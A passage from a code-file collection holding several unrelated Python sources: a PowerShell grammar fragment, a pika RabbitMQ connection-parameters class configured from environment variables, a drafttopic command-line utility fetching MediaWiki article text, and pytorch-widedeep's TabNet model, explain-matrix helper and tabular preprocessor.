grammar = ("<#", OPTIONAL(DelimitedCommentText), Hashes, ">")
class RequiresComment(Grammar):
grammar = ("#requires", WHITESPACE, CommandArgument)
class SingleLineComment(Grammar):
grammar = ("#", OPTIONAL(WHITESPACE), OPTIONAL(InputCharacters))
class Comment(Grammar):
grammar = OR(SingleLineComment, RequiresComment, DelimitedComment)
class SignatureBegin(Grammar):
grammar = (NewLineCharacter, "# SIG # Begin signature block",
NewLineCharacter)
class SignatureEnd(Grammar):
grammar = (NewLineCharacter, "# SIG # End signature block",
NewLineCharacter)
class Signature(Grammar):
grammar = LIST_OF(SingleLineComment, sep=NewLineCharacter)
class SignatureBlock(Grammar):
grammar = (SignatureBegin, Signature, SignatureEnd)
class Token(Grammar):
grammar = OR(
Keyword,
Variable,
Command,
CommandParameter,
IntegerLiteral,
RealLiteral,
StringLiteral,
TypeLiteral,
OperatorOrPunctuator,
)
class InputElement(Grammar):
grammar = OR(WHITESPACE, Comment, Token)
class InputElements(Grammar):
grammar = LIST_OF(InputElement, sep=NewLineCharacter)
class Input(Grammar):
grammar = OPTIONAL(InputElements), OPTIONAL(SignatureBlock)
``` |
{
"source": "5uper5hoot/PikaExamples",
"score": 3
} |
#### File: PikaExamples/pikatools/connection.py
```python
import os
import ssl
import pika
# alternate bool constructor that first converts arg to int.
def bool_(s):
return bool(int(s))
class EnvConnectionParameters(pika.ConnectionParameters):
""" Values for all connection parameters are established using
environment variables. If there is not an environment variable
set for a given attribute, it will fall back to the pika
default as established in `connection.Parameters` class.
Format of scalar attribute environment variable is:
`PIKA_<NAME_OF_ATTR_IN_CAPS>`
For example, to set host: `export PIKA_HOST = '123.456.789.10'`.
Scalar attribute names (coerced type, default) are:
- backpressure_detection (bool, False)
- blocked_connection_timeout (float, None)
- channel_max (int, 65535)
- connection_attempts (int, 1)
- frame_max (int, 131072)
- heartbeat* (int, None)
- host (str, 'localhost')
- locale (str, 'en_US')
- retry_delay (float, 2.0)
- socket_timeout (float, 10.0)
- ssl (bool, False)
- port (int, 5672 or 5671 depending on ssl)
- virtual_host (str, '/')
Connection parameters that require a collection of values or a
specific type need to be of the format:
`PIKA_<ATTR_NAME_IN_CAPS>_<VALUE_NAME_IN_CAPS>`
Parameter names (default) that require a mapping of values include:
- client_properties (None)
- credentials
(pika_credentials.PlainCredentials('guest', 'guest'))
- ssl_options (None)
- tcp_options (None)
Specific details of the handling of each attribute that requires a
mapping follows:
client_properties
-----------------
Format env vars as:
`PIKA_CLIENT_PROPERTIES_<VALUE_NAME_IN_CAPS>`
Value names that can be set here are 'product', 'platform',
'information', 'version'. client_properties also accepts a mapping
called 'capabilities' which can be controlled by setting env vars
with the format:
`PIKA_CLIENT_PROPERTIES_CAPABILITIES_<KEY_NAME_IN_CAPS>
The capabilities key names that are searched for are,
'authentication_failure_close', 'basic.nack', 'connection.blocked',
    'consumer_cancel_notify', and 'publisher_confirms'. All accept
    boolean values (set the env var as 1 or 0).
credentials
-----------
Format env vars as:
`PIKA_CREDENTIALS_<ATTR_NAME_IN_CAPS>`
If credentials are passed in via env vars, then the credentials
object is taken to be a credentials.PlainCredentials object and
    the attribute names that are searched for are 'username' (str),
    'password' (str), and 'erase_on_connect' (bool, set as 1 or 0).
ssl_options
-----------
Format env vars as:
`PIKA_SSL_OPTIONS_<ATTR_NAME_IN_CAPS>`
Where attr name is one of:
- keyfile (str)
- key_password (str)
- certfile (str)
- server_side (bool)
- verify_mode* (str)
- ssl_version* (str)
- cafile (str)
- capath (str)
- cadata (str)
- do_handshake_on_connect (bool)
- suppress_ragged_eofs (bool)
- ciphers (str)
- server_hostname (str)
verify_mode must be one of 'CERT_NONE', 'CERT_OPTIONAL' or
    'CERT_REQUIRED', if set. ssl_version must be the name of one of the
    protocol constants found in the ssl module, e.g. 'PROTOCOL_TLS'.
The value will be used to get the object of the same name from the
ssl module.
tcp_options
-----------
Format env vars as:
`PIKA_TCP_OPTIONS_<KEY_NAME_IN_CAPS>`
Key names sought are, 'TCP_KEEPIDLE', 'TCP_KEEPINTVL',
'TCP_KEEPCNT', 'TCP_USER_TIMEOUT'.
"""
# Protect against accidental assignment of an invalid attribute
__slots__ = ()
def __init__(self, heartbeat_callable=None):
def _env_or_default(attr, cast):
""" Return environment variable or existing value."""
try:
return cast(os.environ[f"PIKA_{attr.upper()}"])
except KeyError:
return getattr(self, attr)
# pre-populates all attrs with default values
super(pika.ConnectionParameters, self).__init__()
for attr, cast in [
("backpressure_detection", bool_),
("blocked_connection_timeout", float),
("channel_max", int),
("connection_attempts", int),
("frame_max", int),
("heartbeat", int),
("host", str),
("locale", str),
("retry_delay", float),
("socket_timeout", float),
("ssl", bool_),
("virtual_host", str),
]:
setattr(self, attr, _env_or_default(attr, cast))
if os.getenv("PIKA_PORT", None):
self.port = os.getenv("PIKA_PORT")
else:
if self.ssl:
self.port = super(
pika.ConnectionParameters, self
).DEFAULT_SSL_PORT
else:
self.port = super(pika.ConnectionParameters, self).DEFAULT_PORT
self.client_properties = self._get_client_properties()
self.credentials = self._get_credentials()
self.ssl_options = self._get_ssl_options()
self.tcp_options = self._get_tcp_options()
@staticmethod
def _get_related_env_vars(prefix, keys, casts=None):
if not casts:
casts = [str for k in keys]
d = {}
for k, c in zip(keys, casts):
try:
d[k] = c(os.environ[f"{prefix}_{k.upper()}"])
except KeyError:
pass
return d
def _get_client_properties(self):
properties_prefix = "PIKA_CLIENT_PROPERTIES"
properties_keys = ["product", "platform", "information", "version"]
properties = self._get_related_env_vars(
properties_prefix, properties_keys
)
capabilities_prefix = "PIKA_CLIENT_PROPERTIES_CAPABILITIES"
capabilities_keys = [
"authentication_failure_close",
"basic.nack",
"connection.blocked",
"consumer_cancel_notify",
"publisher_confirms",
]
capabilities_casts = (bool_ for s in capabilities_keys)
capabilities = self._get_related_env_vars(
capabilities_prefix, capabilities_keys, capabilities_casts
)
if capabilities:
properties["capabilities"] = capabilities
return properties or getattr(self, "client_properties")
def _get_credentials(self):
prefix = "PIKA_CREDENTIALS"
keys = ["username", "password", "erase_on_connect"]
casts = [str, str, lambda s: bool(int(s))]
credentials = self._get_related_env_vars(prefix, keys, casts)
if credentials:
return pika.PlainCredentials(**credentials)
else:
return getattr(self, "credentials")
def _get_ssl_options(self):
prefix = "PIKA_SSL_OPTIONS"
atrs = {
"keyfile": str,
"key_password": str,
"certfile": str,
"server_side": bool_,
"verify_mode": str,
"ssl_version": str,
"cafile": str,
"capath": str,
"cadata": str,
"do_handshake_on_connect": bool_,
"suppress_ragged_eofs": bool_,
"ciphers": str,
"server_hostname": str,
}
ssl_options = self._get_related_env_vars(
prefix, atrs.keys(), atrs.values()
)
if ssl_options:
if "verify_mode" in ssl_options:
ssl_options["verify_mode"] = getattr(
ssl, ssl_options["verify_mode"]
)
if "ssl_version" in ssl_options:
ssl_options["ssl_version"] = getattr(
ssl, ssl_options["ssl_version"]
)
return pika.SSLOptions(**ssl_options)
else:
return getattr(self, "ssl_options")
def _get_tcp_options(self):
prefix = "PIKA_TCP_OPTIONS"
keys = [
"TCP_KEEPIDLE",
"TCP_KEEPINTVL",
"TCP_KEEPCNT",
"TCP_USER_TIMEOUT",
]
casts = [int] * 4
tcp_options = self._get_related_env_vars(prefix, keys, casts)
return tcp_options or getattr(self, "tcp_options")
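# Minimal usage sketch (hypothetical host/credentials, shown only to illustrate
# the PIKA_* environment-variable convention described in the class docstring):
#
#   os.environ["PIKA_HOST"] = "rabbitmq.example.com"
#   os.environ["PIKA_CREDENTIALS_USERNAME"] = "app_user"
#   os.environ["PIKA_CREDENTIALS_PASSWORD"] = "app_pass"
#   os.environ["PIKA_HEARTBEAT"] = "30"
#
#   params = EnvConnectionParameters()
#   connection = pika.BlockingConnection(params)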
``` |
{
"source": "5uperpalo/drafttopic",
"score": 2
} |
#### File: drafttopic/drafttopic/drafttopic.py
```python
import sys
import traceback
from importlib import import_module
USAGE = """Usage:
drafttopic (-h | --help)
drafttopic <utility> [-h | --help]\n"""
def main():
if len(sys.argv) < 2:
sys.stderr.write(USAGE)
sys.exit(1)
elif sys.argv[1] in ("-h", "--help"):
sys.stderr.write(__doc__ + "\n")
sys.exit(1)
elif sys.argv[1][:1] == "-":
sys.stderr.write(USAGE)
sys.exit(1)
module_name = sys.argv[1]
try:
module = import_module(".utilities." + module_name,
package="drafttopic")
except ImportError:
sys.stderr.write(traceback.format_exc())
sys.stderr.write("Could not load utility {0}.\n".format(module_name))
sys.exit(1)
module.main(sys.argv[2:])
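# Example invocation (assuming the package installs a `drafttopic` console
# entry point, as the USAGE text above suggests), dispatching to the
# fetch_article_text utility defined below:
#   $ drafttopic fetch_article_text --help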
```
#### File: drafttopic/utilities/fetch_article_text.py
```python
import logging
import sys
from concurrent.futures import ThreadPoolExecutor
import mwapi
from docopt import docopt
from revscoring.utilities.util import dump_observation, read_observations
from .fetch_draft_text import DRAFTTOPIC_UA, build_fetch_text
logger = logging.getLogger(__name__)
def main(argv=None):
args = docopt(__doc__, argv=argv)
logging.basicConfig(
level=logging.INFO if not args['--debug'] else logging.DEBUG,
format='%(asctime)s %(levelname)s:%(name)s -- %(message)s')
logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
if args['--input'] == '<stdin>':
observations = read_observations(sys.stdin)
else:
observations = read_observations(open(args['--input']))
if args['--output'] == '<stdout>':
output = sys.stdout
else:
output = open(args['--output'], 'w')
threads = int(args['--threads'])
session = mwapi.Session(args['--api-host'],
user_agent=DRAFTTOPIC_UA)
run(observations, session, threads, output)
def run(observations, session, threads, output):
for obs in fetch_article_texts(observations, session, threads):
dump_observation(obs, output)
def fetch_article_texts(observations, session, threads):
"""
Fetches article (recent revision) text for observations from a
MediaWiki API.
"""
executor = ThreadPoolExecutor(max_workers=threads)
_fetch_article_text = build_fetch_text(build_get_recent_revision(session))
for obs in executor.map(_fetch_article_text, observations):
if obs is not None:
yield obs
logger.debug("Write {0} with {1} chars of text."
.format(obs['title'], len(obs['text'])))
def build_get_recent_revision(session):
def get_recent_revision(title):
return session.get(
action="query",
prop="revisions",
rvprop=["content", "ids"],
titles=title,
redirects=True,
rvlimit=1,
rvdir="older",
formatversion=2,
rvslots=["main"]
)
return get_recent_revision
``` |
{
"source": "5uperpalo/pytorch-widedeep",
"score": 2
} |
#### File: models/tabnet/tab_net.py
```python
import warnings
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn
from pytorch_widedeep.wdtypes import * # noqa: F403
from pytorch_widedeep.models.tabnet import sparsemax
def initialize_non_glu(module, input_dim: int, output_dim: int):
gain_value = np.sqrt((input_dim + output_dim) / np.sqrt(4 * input_dim))
torch.nn.init.xavier_normal_(module.weight, gain=gain_value)
return
def initialize_glu(module, input_dim: int, output_dim: int):
gain_value = np.sqrt((input_dim + output_dim) / np.sqrt(input_dim))
torch.nn.init.xavier_normal_(module.weight, gain=gain_value)
return
class GBN(torch.nn.Module):
"""
Ghost Batch Normalization
https://arxiv.org/abs/1705.08741
"""
def __init__(
self, input_dim: int, virtual_batch_size: int = 128, momentum: float = 0.01
):
super(GBN, self).__init__()
self.virtual_batch_size = virtual_batch_size
self.bn = nn.BatchNorm1d(input_dim, momentum=momentum)
def forward(self, X: Tensor) -> Tensor:
chunks = X.chunk(int(np.ceil(X.shape[0] / self.virtual_batch_size)), 0)
res = [self.bn(x_) for x_ in chunks]
return torch.cat(res, dim=0)
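# Example of the ghost-batch split above: with virtual_batch_size=128, a batch
# of 300 rows is chunked into ceil(300 / 128) = 3 virtual batches of 100 rows
# each; BatchNorm statistics are computed per chunk before concatenation.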
class GLU_Layer(nn.Module):
def __init__(
self,
input_dim: int,
output_dim: int,
dropout: float,
fc: nn.Module = None,
ghost_bn: bool = True,
virtual_batch_size: int = 128,
momentum: float = 0.02,
):
super(GLU_Layer, self).__init__()
if fc:
self.fc = fc
else:
self.fc = nn.Linear(input_dim, 2 * output_dim, bias=False)
initialize_glu(self.fc, input_dim, 2 * output_dim)
if ghost_bn:
self.bn: Union[GBN, nn.BatchNorm1d] = GBN(
2 * output_dim, virtual_batch_size=virtual_batch_size, momentum=momentum
)
else:
self.bn = nn.BatchNorm1d(2 * output_dim, momentum=momentum)
self.dp = nn.Dropout(dropout)
def forward(self, X: Tensor) -> Tensor:
return self.dp(F.glu(self.bn(self.fc(X))))
class GLU_Block(nn.Module):
def __init__(
self,
input_dim: int,
output_dim: int,
dropout: float,
n_glu: int = 2,
first: bool = False,
shared_layers: nn.ModuleList = None,
ghost_bn: bool = True,
virtual_batch_size: int = 128,
momentum: float = 0.02,
):
super(GLU_Block, self).__init__()
self.first = first
if (shared_layers is not None) and (n_glu != len(shared_layers)):
self.n_glu = len(shared_layers)
warnings.warn(
"If 'shared_layers' is nor None, 'n_glu' must be equal to the number of shared_layers."
"Got n_glu = {} and n shared_layers = {}. 'n_glu' has been set to {}".format(
n_glu, len(shared_layers), len(shared_layers)
),
UserWarning,
)
else:
self.n_glu = n_glu
glu_dim = [input_dim] + [output_dim] * self.n_glu
self.glu_layers = nn.ModuleList()
for i in range(self.n_glu):
fc = shared_layers[i] if shared_layers else None
self.glu_layers.append(
GLU_Layer(
glu_dim[i],
glu_dim[i + 1],
dropout,
fc=fc,
ghost_bn=ghost_bn,
virtual_batch_size=virtual_batch_size,
momentum=momentum,
)
)
def forward(self, X: Tensor) -> Tensor:
scale = torch.sqrt(torch.FloatTensor([0.5]).to(X.device))
if self.first: # the first layer of the block has no scale multiplication
x = self.glu_layers[0](X)
layers_left = range(1, self.n_glu)
else:
x = nn.Identity()(X)
layers_left = range(self.n_glu)
for glu_id in layers_left:
x = torch.add(x, self.glu_layers[glu_id](x)) * scale
return x
class FeatTransformer(nn.Module):
def __init__(
self,
input_dim: int,
output_dim: int,
dropout: float,
shared_layers: nn.ModuleList,
n_glu_step_dependent: int,
ghost_bn=True,
virtual_batch_size=128,
momentum=0.02,
):
super(FeatTransformer, self).__init__()
params = {
"ghost_bn": ghost_bn,
"virtual_batch_size": virtual_batch_size,
"momentum": momentum,
}
self.shared = GLU_Block(
input_dim,
output_dim,
dropout,
n_glu=len(shared_layers),
first=True,
shared_layers=shared_layers,
**params
)
self.step_dependent = GLU_Block(
output_dim,
output_dim,
dropout,
n_glu=n_glu_step_dependent,
first=False,
**params
)
def forward(self, X: Tensor) -> Tensor:
return self.step_dependent(self.shared(X))
class AttentiveTransformer(nn.Module):
def __init__(
self,
input_dim: int,
output_dim: int,
mask_type: str = "sparsemax",
ghost_bn=True,
virtual_batch_size=128,
momentum=0.02,
):
super(AttentiveTransformer, self).__init__()
self.fc = nn.Linear(input_dim, output_dim, bias=False)
initialize_non_glu(self.fc, input_dim, output_dim)
if ghost_bn:
self.bn: Union[GBN, nn.BatchNorm1d] = GBN(
output_dim, virtual_batch_size=virtual_batch_size, momentum=momentum
)
else:
self.bn = nn.BatchNorm1d(output_dim, momentum=momentum)
if mask_type == "sparsemax":
self.mask: Union[Sparsemax, Entmax15] = sparsemax.Sparsemax(dim=-1)
elif mask_type == "entmax":
self.mask = sparsemax.Entmax15(dim=-1)
else:
raise NotImplementedError(
"Please choose either 'sparsemax' or 'entmax' as masktype"
)
def forward(self, priors: Tensor, processed_feat: Tensor) -> Tensor:
x = self.bn(self.fc(processed_feat))
x = torch.mul(x, priors)
return self.mask(x)
class TabNetEncoder(nn.Module):
def __init__(
self,
input_dim: int,
n_steps: int = 3,
step_dim: int = 8,
attn_dim: int = 8,
dropout: float = 0.0,
n_glu_step_dependent: int = 2,
n_glu_shared: int = 2,
ghost_bn: bool = True,
virtual_batch_size: int = 128,
momentum: float = 0.02,
gamma: float = 1.3,
epsilon: float = 1e-15,
mask_type: str = "sparsemax",
):
super(TabNetEncoder, self).__init__()
self.input_dim = input_dim
self.n_steps = n_steps
self.step_dim = step_dim
self.attn_dim = attn_dim
self.gamma = gamma
self.epsilon = epsilon
self.initial_bn = nn.BatchNorm1d(input_dim, momentum=0.01)
params = {
"ghost_bn": ghost_bn,
"virtual_batch_size": virtual_batch_size,
"momentum": momentum,
}
shared_layers = nn.ModuleList()
for i in range(n_glu_shared):
if i == 0:
shared_layers.append(
nn.Linear(input_dim, 2 * (step_dim + attn_dim), bias=False)
)
else:
shared_layers.append(
nn.Linear(
step_dim + attn_dim, 2 * (step_dim + attn_dim), bias=False
)
)
self.initial_splitter = FeatTransformer(
input_dim,
step_dim + attn_dim,
dropout,
shared_layers,
n_glu_step_dependent,
**params
)
self.feat_transformers = nn.ModuleList()
self.attn_transformers = nn.ModuleList()
for step in range(n_steps):
feat_transformer = FeatTransformer(
input_dim,
step_dim + attn_dim,
dropout,
shared_layers,
n_glu_step_dependent,
**params
)
attn_transformer = AttentiveTransformer(
attn_dim, input_dim, mask_type, **params
)
self.feat_transformers.append(feat_transformer)
self.attn_transformers.append(attn_transformer)
def forward(self, X: Tensor) -> Tuple[List[Tensor], Tensor]:
x = self.initial_bn(X)
# P[n_step = 0] is initialized as all ones, 1^(B×D)
prior = torch.ones(x.shape).to(x.device)
# sparsity regularization
M_loss = torch.FloatTensor([0.0]).to(x.device)
# split block
attn = self.initial_splitter(x)[:, self.step_dim :]
steps_output = []
for step in range(self.n_steps):
# learnable mask: M[i] = sparsemax(prior[i − 1] · hi(a[i − 1]))
# where hi = FC + BN
M = self.attn_transformers[step](prior, attn)
# update prior: P[i] = \prod_{i}^{j=1} (γ − M[j])
prior = torch.mul(self.gamma - M, prior)
# sparsity regularization
M_loss += torch.mean(
torch.sum(torch.mul(M, torch.log(M + self.epsilon)), dim=1)
)
# update attention and d_out
masked_x = torch.mul(M, x)
out = self.feat_transformers[step](masked_x)
attn = out[:, self.step_dim :]
d_out = nn.ReLU()(out[:, : self.step_dim])
steps_output.append(d_out)
M_loss /= self.n_steps # type: ignore[has-type]
return steps_output, M_loss
def forward_masks(self, X: Tensor) -> Tuple[Tensor, Dict[int, Tensor]]:
x = self.initial_bn(X)
prior = torch.ones(x.shape).to(x.device)
M_explain = torch.zeros(x.shape).to(x.device)
attn = self.initial_splitter(x)[:, self.step_dim :]
masks = {}
for step in range(self.n_steps):
M = self.attn_transformers[step](prior, attn)
masks[step] = M
prior = torch.mul(self.gamma - M, prior)
masked_x = torch.mul(M, x)
out = self.feat_transformers[step](masked_x)
attn = out[:, self.step_dim :]
# 'decision contribution' in the paper
d_out = nn.ReLU()(out[:, : self.step_dim])
# aggregate decision contribution
agg_decision_contrib = torch.sum(d_out, dim=1)
M_explain += torch.mul(M, agg_decision_contrib.unsqueeze(dim=1))
return M_explain, masks
class EmbeddingsAndContinuous(nn.Module):
def __init__(
self,
column_idx: Dict[str, int],
embed_input: List[Tuple[str, int, int]],
embed_dropout: float,
continuous_cols: Optional[List[str]],
batchnorm_cont: bool,
):
super(EmbeddingsAndContinuous, self).__init__()
self.column_idx = column_idx
self.embed_input = embed_input
self.continuous_cols = continuous_cols
self.batchnorm_cont = batchnorm_cont
        # Embeddings: val + 1 because 0 is reserved for padding/unseen categories.
self.embed_layers = nn.ModuleDict(
{
"emb_layer_" + col: nn.Embedding(val + 1, dim, padding_idx=0)
for col, val, dim in self.embed_input
}
)
self.embedding_dropout = nn.Dropout(embed_dropout)
emb_out_dim = np.sum([embed[2] for embed in self.embed_input])
# Continuous
if self.continuous_cols is not None:
cont_out_dim = len(self.continuous_cols)
if self.batchnorm_cont:
self.norm = nn.BatchNorm1d(cont_out_dim)
else:
cont_out_dim = 0
self.output_dim: int = emb_out_dim + cont_out_dim # type: ignore[assignment]
def forward(self, X: Tensor) -> Tensor:
embed = [
self.embed_layers["emb_layer_" + col](X[:, self.column_idx[col]].long())
for col, _, _ in self.embed_input
]
x = torch.cat(embed, 1)
x = self.embedding_dropout(x)
if self.continuous_cols is not None:
cont_idx = [self.column_idx[col] for col in self.continuous_cols]
x_cont = X[:, cont_idx].float()
if self.batchnorm_cont:
x_cont = self.norm(x_cont)
x = torch.cat([x, x_cont], 1) if self.embed_input is not None else x_cont
return x
class TabNet(nn.Module):
r"""TabNet model (https://arxiv.org/abs/1908.07442) model that can be used
as the deeptabular component of a Wide & Deep model.
The implementation in this library is fully based on that here:
https://github.com/dreamquark-ai/tabnet, simply adapted so that it can
work within the ``WideDeep`` frame. Therefore, **all credit to the
dreamquark-ai team**
Parameters
----------
column_idx: Dict
Dictionary where the keys are the columns and the values their
corresponding index
embed_input: List
List of Tuples with the column name, number of unique values and
embedding dimension. e.g. [(education, 11, 32), ...]
embed_dropout: float, default = 0.
embeddings dropout
continuous_cols: List, Optional, default = None
List with the name of the numeric (aka continuous) columns
batchnorm_cont: bool, default = False
Boolean indicating whether or not to apply batch normalization to the
continuous input
n_steps: int, default = 3
number of decision steps
step_dim: int, default = 8
Step's output dimension. This is the output dimension that
``WideDeep`` will collect and connect to the output neuron(s). For
a better understanding of the function of this and the upcoming
parameters, please see the `paper
<https://arxiv.org/abs/1908.07442>`_.
attn_dim: int, default = 8
Attention dimension
dropout: float, default = 0.0
GLU block 'internal' dropout
n_glu_step_dependent: int, default = 2
number of GLU Blocks [FC -> BN -> GLU] that are step dependent
n_glu_shared: int, default = 2
number of GLU Blocks [FC -> BN -> GLU] that will be shared
across decision steps
ghost_bn: bool, default=True
Boolean indicating if `Ghost Batch Normalization
<https://arxiv.org/abs/1705.08741>`_ will be used.
virtual_batch_size: int, default = 128
Batch size when using Ghost Batch Normalization
momentum: float, default = 0.02
        Ghost Batch Normalization's momentum. The dreamquark-ai team advises
        very low values, while the results in the paper use significantly higher
        values. Higher values led to better results in my experiments
gamma: float, default = 1.3
Relaxation parameter in the paper. When gamma = 1, a feature is
enforced to be used only at one decision step and as gamma
increases, more flexibility is provided to use a feature at
multiple decision steps
epsilon: float, default = 1e-15
Float to avoid log(0). Always keep low
mask_type: str, default = "sparsemax"
Mask function to use. Either "sparsemax" or "entmax"
Attributes
----------
embed_and_cont: ``nn.ModuleDict``
``ModuleDict`` with the embeddings and continuous setup
embed_and_cont_dim: int
embeddings plus continuous dimension
output_dim: int
The output dimension of the model. This is a required attribute
        necessary to build the WideDeep class
tabnet_encoder: ``nn.Module``
``Module`` containing the TabNet encoder. See the `paper
<https://arxiv.org/abs/1908.07442>`_.
Example
--------
>>> import torch
>>> from pytorch_widedeep.models import TabNet
>>> X_tab = torch.cat((torch.empty(5, 4).random_(4), torch.rand(5, 1)), axis=1)
>>> colnames = ['a', 'b', 'c', 'd', 'e']
>>> embed_input = [(u,i,j) for u,i,j in zip(colnames[:4], [4]*4, [8]*4)]
>>> column_idx = {k:v for v,k in enumerate(colnames)}
>>> model = TabNet(column_idx=column_idx, embed_input=embed_input, continuous_cols = ['e'])
"""
def __init__(
self,
column_idx: Dict[str, int],
embed_input: List[Tuple[str, int, int]],
embed_dropout: float = 0.0,
continuous_cols: Optional[List[str]] = None,
batchnorm_cont: bool = False,
n_steps: int = 3,
step_dim: int = 8,
attn_dim: int = 8,
dropout: float = 0.0,
n_glu_step_dependent: int = 2,
n_glu_shared: int = 2,
ghost_bn: bool = True,
virtual_batch_size: int = 128,
momentum: float = 0.02,
gamma: float = 1.3,
epsilon: float = 1e-15,
mask_type: str = "sparsemax",
):
super(TabNet, self).__init__()
self.column_idx = column_idx
self.embed_input = embed_input
self.embed_dropout = embed_dropout
self.continuous_cols = continuous_cols
self.batchnorm_cont = batchnorm_cont
self.n_steps = n_steps
self.step_dim = step_dim
self.attn_dim = attn_dim
self.dropout = dropout
self.n_glu_step_dependent = n_glu_step_dependent
self.n_glu_shared = n_glu_shared
self.ghost_bn = ghost_bn
self.virtual_batch_size = virtual_batch_size
self.momentum = momentum
self.gamma = gamma
self.epsilon = epsilon
self.mask_type = mask_type
self.embed_and_cont = EmbeddingsAndContinuous(
column_idx, embed_input, embed_dropout, continuous_cols, batchnorm_cont
)
self.embed_and_cont_dim = self.embed_and_cont.output_dim
self.tabnet_encoder = TabNetEncoder(
self.embed_and_cont.output_dim,
n_steps,
step_dim,
attn_dim,
dropout,
n_glu_step_dependent,
n_glu_shared,
ghost_bn,
virtual_batch_size,
momentum,
gamma,
epsilon,
mask_type,
)
self.output_dim = step_dim
def forward(self, X: Tensor) -> Tuple[Tensor, Tensor]:
x = self.embed_and_cont(X)
steps_output, M_loss = self.tabnet_encoder(x)
res = torch.sum(torch.stack(steps_output, dim=0), dim=0)
return (res, M_loss)
def forward_masks(self, X: Tensor) -> Tuple[Tensor, Dict[int, Tensor]]:
x = self.embed_and_cont(X)
return self.tabnet_encoder.forward_masks(x)
class TabNetPredLayer(nn.Module):
def __init__(self, inp, out):
r"""This class is a 'hack' required because TabNet is a very particular
model within ``WideDeep``.
TabNet's forward method within ``WideDeep`` outputs two tensors, one
with the last layer's activations and the sparse regularization
factor. Since the output needs to be collected by ``WideDeep`` to then
Sequentially build the output layer (connection to the output
neuron(s)) I need to code a custom TabNetPredLayer that accepts two
inputs. This will be used by the ``WideDeep`` class.
"""
super(TabNetPredLayer, self).__init__()
self.pred_layer = nn.Linear(inp, out, bias=False)
initialize_non_glu(self.pred_layer, inp, out)
def forward(self, tabnet_tuple: Tuple[Tensor, Tensor]) -> Tuple[Tensor, Tensor]:
res, M_loss = tabnet_tuple[0], tabnet_tuple[1]
return self.pred_layer(res), M_loss
```
#### File: models/tabnet/tab_net_utils.py
```python
import numpy as np
from scipy.sparse import csc_matrix
from pytorch_widedeep.wdtypes import WideDeep
def create_explain_matrix(model: WideDeep) -> csc_matrix:
"""
Returns a sparse matrix used to compute the feature importances after
training
Parameters
----------
model: WideDeep
object of type ``WideDeep``
Examples
--------
>>> from pytorch_widedeep.models import TabNet, WideDeep
>>> from pytorch_widedeep.models.tabnet.tab_net_utils import create_explain_matrix
>>> embed_input = [("a", 4, 2), ("b", 4, 2), ("c", 4, 2)]
>>> cont_cols = ["d", "e"]
>>> column_idx = {k: v for v, k in enumerate(["a", "b", "c", "d", "e"])}
>>> deeptabular = TabNet(column_idx=column_idx, embed_input=embed_input, continuous_cols=cont_cols)
>>> model = WideDeep(deeptabular=deeptabular)
>>> reduce_mtx = create_explain_matrix(model)
>>> reduce_mtx.todense()
matrix([[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]])
"""
(
embed_input,
column_idx,
embed_and_cont_dim,
) = _extract_tabnet_params(model)
n_feat = len(column_idx)
col_embeds = {e[0]: e[2] - 1 for e in embed_input}
embed_colname = [e[0] for e in embed_input]
cont_colname = [c for c in column_idx.keys() if c not in embed_colname]
embed_cum_counter = 0
indices_trick = []
for colname, idx in column_idx.items():
if colname in cont_colname:
indices_trick.append([idx + embed_cum_counter])
elif colname in embed_colname:
indices_trick.append(
range( # type: ignore[arg-type]
idx + embed_cum_counter,
idx + embed_cum_counter + col_embeds[colname] + 1,
)
)
embed_cum_counter += col_embeds[colname]
reducing_matrix = np.zeros((embed_and_cont_dim, n_feat))
for i, cols in enumerate(indices_trick):
reducing_matrix[cols, i] = 1
return csc_matrix(reducing_matrix)
def _extract_tabnet_params(model: WideDeep):
tabnet_backbone = list(model.deeptabular.children())[0]
column_idx = tabnet_backbone.column_idx
embed_input = tabnet_backbone.embed_input
embed_and_cont_dim = tabnet_backbone.embed_and_cont_dim
return embed_input, column_idx, embed_and_cont_dim
```
#### File: pytorch_widedeep/preprocessing/tab_preprocessor.py
```python
import warnings
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
from pytorch_widedeep.wdtypes import * # noqa: F403
from pytorch_widedeep.utils.deeptabular_utils import LabelEncoder
from pytorch_widedeep.preprocessing.base_preprocessor import (
BasePreprocessor,
check_is_fitted,
)
def embed_sz_rule(n_cat):
r"""Rule of thumb to pick embedding size corresponding to ``n_cat``. Taken
from fastai's Tabular API"""
return min(600, round(1.6 * n_cat ** 0.56))
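# Worked example: a categorical column with 100 distinct values gets
# embed_sz_rule(100) = min(600, round(1.6 * 100 ** 0.56)) = min(600, 21) = 21.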
class TabPreprocessor(BasePreprocessor):
r"""Preprocessor to prepare the ``deeptabular`` component input dataset
Parameters
----------
embed_cols: List, default = None
List containing the name of the columns that will be represented by
embeddings or a Tuple with the name and the embedding dimension. e.g.:
[('education',32), ('relationship',16), ...]
continuous_cols: List, default = None
List with the name of the so called continuous cols
scale: bool, default = True
        Bool indicating whether or not to scale/standardise continuous
        cols. The user should bear in mind that all the ``deeptabular``
        components available within ``pytorch-widedeep`` also include
        the possibility of normalising the input continuous features via a
        ``BatchNorm`` or a ``LayerNorm`` layer. See
:class:`pytorch_widedeep.models`
auto_embed_dim: bool, default = True
Boolean indicating whether the embedding dimensions will be
        automatically defined via fastai's rule of thumb:
        :math:`min(600, round(1.6 \times n_{cat}^{0.56}))`
default_embed_dim: int, default=16
Dimension for the embeddings used for the ``deeptabular``
component if the embed_dim is not provided in the ``embed_cols``
parameter
already_standard: List, default = None
List with the name of the continuous cols that do not need to be
        Standardised. For example, you might have Long and Lat in your
dataset and might want to encode them somehow (e.g. see the
``LatLongScalarEnc`` available in the `autogluon
<https://github.com/awslabs/autogluon/tree/master/tabular/src/autogluon/tabular>`_
        tabular library) and not standardize them any further
for_tabtransformer: bool, default = False
Boolean indicating whether the preprocessed data will be passed to
a ``TabTransformer`` model. If ``True``, the param ``embed_cols``
must just be a list containing the categorical columns: e.g.:
['education', 'relationship', ...] This is because following the
results in the `paper <https://arxiv.org/pdf/2012.06678.pdf>`_,
they will all be encoded using embeddings of the same dim (32 by
default). See
:class:`pytorch_widedeep.models.tab_transformer.TabTransformer`
verbose: int, default = 1
Attributes
----------
embed_dim: Dict
Dictionary where keys are the embed cols and values are the embedding
dimensions. If ``for_tabtransformer`` is set to ``True`` the embedding
